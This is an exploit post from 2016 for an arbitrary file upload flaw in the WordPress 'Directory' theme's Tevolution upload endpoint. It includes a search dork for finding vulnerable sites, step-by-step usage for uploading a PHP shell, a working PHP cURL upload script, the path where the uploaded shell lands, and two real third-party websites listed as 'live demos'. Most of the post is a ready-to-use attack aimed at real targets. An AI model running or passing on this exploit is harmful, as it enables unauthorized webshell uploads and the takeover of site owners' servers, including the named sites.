Wordpress Theme Directory Arbitrary Shell Upload Vulnerability

#####################

# Exploit Title : Wordpress Theme Directory Arbitrary Shell Upload Vulnerability

# Exploit Author : xBADGIRL21

# Dork : inurl:/wp-content/themes/Directory/

# Vendor Homepage : https://templatic.com/

# version : 2.0.16 - 2.0.14 & maybe high or lower

# Tested on: [ BackBox ]

# skype:xbadgirl21

# Date: 15/08/2016

# video Proof : https://youtu.be/eVjW6rnaoSY

#####################

# [+] USAGE :

#####################

# 1.- Download or Copy the Exploit C0des

# 2.- Use Dork and Choose One Of the Website 

# 3.- Edit The Script

# 4.- Upload Your File : shell.php.jpg or shell.php.txt

#####################

# [+] Exploit:

####################

<?php
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean you are the Founder or Owner of this ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 

#####################

# [+] Dev!l Path :

#####################

# http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt

#####################

# [+] Live Demo :

#####################

# http://guiagronicaragua.com/wp-content/themes/Directory/

# http://ilovehermanus.co.za/rv//wp-content/themes/Directory/

#####################

# Discovered by : xBADGIRL21 - Unkn0wN 

# Greetz : All Mauritanien Hackers - NoWhere

#######################

### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't Want me to Write His Name

# so I Just Write the Exploit C0des ...........

#####################

Video Proof







Original Source here